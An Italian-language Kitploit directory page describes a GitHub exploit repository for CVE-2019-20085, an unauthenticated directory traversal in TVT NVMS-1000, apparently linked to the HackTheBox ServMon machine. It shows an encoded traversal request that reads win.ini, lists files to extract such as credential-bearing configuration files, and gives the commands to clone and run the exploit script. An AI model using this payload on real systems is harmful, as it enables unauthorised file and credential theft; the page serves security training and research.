Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-20085 — Un repository utilizzato per la macchina ServMon di Hackthebox. | Kitploit
Strumenti/GitHubGitHub/z3r0space/cve-2019-20085
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubz3r0space/cve-2019-20085

CVE-2019-20085

Un repository utilizzato per la macchina ServMon di Hackthebox.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

📂 CVE-2019-20085 – Exploit di Directory Traversal per TVT NVMS-1000 (a cura di Z3R0)

Autore: Z3R0 CVE: CVE-2019-20085 Bersaglio: TVT NVMS-1000 (tutte le versioni note precedenti alla patch) Tipo di vulnerabilità: Directory Traversal senza autenticazione Data: [Inserisci la tua data di rilascio]


🔍 Riepilogo della vulnerabilità

Il software NVMS-1000 di TVT contiene una vulnerabilità di directory traversal nel componente del server web. Inviando una richiesta GET appositamente costruita con sequenze /.., un attaccante non autenticato può accedere a file arbitrari del sistema operativo sottostante, inclusi file di configurazione sensibili, hash di password o chiavi di sistema.


⚠️ Software interessati

  • Prodotto: TVT NVMS-1000
  • Versioni: Tutte le versioni precedenti alla correzione del vendor (tipicamente <= v3.x.x)
  • Piattaforma: Windows

💥 Descrizione dell'exploit

Questo exploit sfrutta la risoluzione vulnerabile dei percorsi file nel server HTTP in esecuzione su NVMS-1000. Non è richiesta alcuna autenticazione. Un attaccante remoto può leggere qualsiasi file accessibile all'utente del servizio.

🧪 Esempio di richiesta malevola

root@kitploit:~
GET /..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: <target-ip>:80

🗂️ File che puoi estrarre

  • File di sistema di Windows (es. C:\Windows\win.ini)
  • File di configurazione NVMS (spesso contengono credenziali codificate in base64 o in chiaro)
  • Directory dei dati utente

🚀 Utilizzo

✅ Requisiti

  • Python 3.x
  • Modulo requests (pip install requests)

▶️ Esegui l'exploit

root@kitploit:~
git clone https://github.com/Z3R0-0x30/CVE-2019-20085.git
cd CVE-2019-20085
python3 exploit.py http://domain.local/ ../../windows/win.ini win.ini"

⚠️ Disclaimer

Questo exploit è rilasciato esclusivamente per scopi educativi e di ricerca sulla sicurezza autorizzata. L'autore Z3R0 non è responsabile per qualsiasi uso improprio o accesso non autorizzato. Ottieni sempre la dovuta autorizzazione prima di testare i sistemi.


📚 Riferimenti

  • Exploitdb
  • NVD - CVE
Scarica lo strumento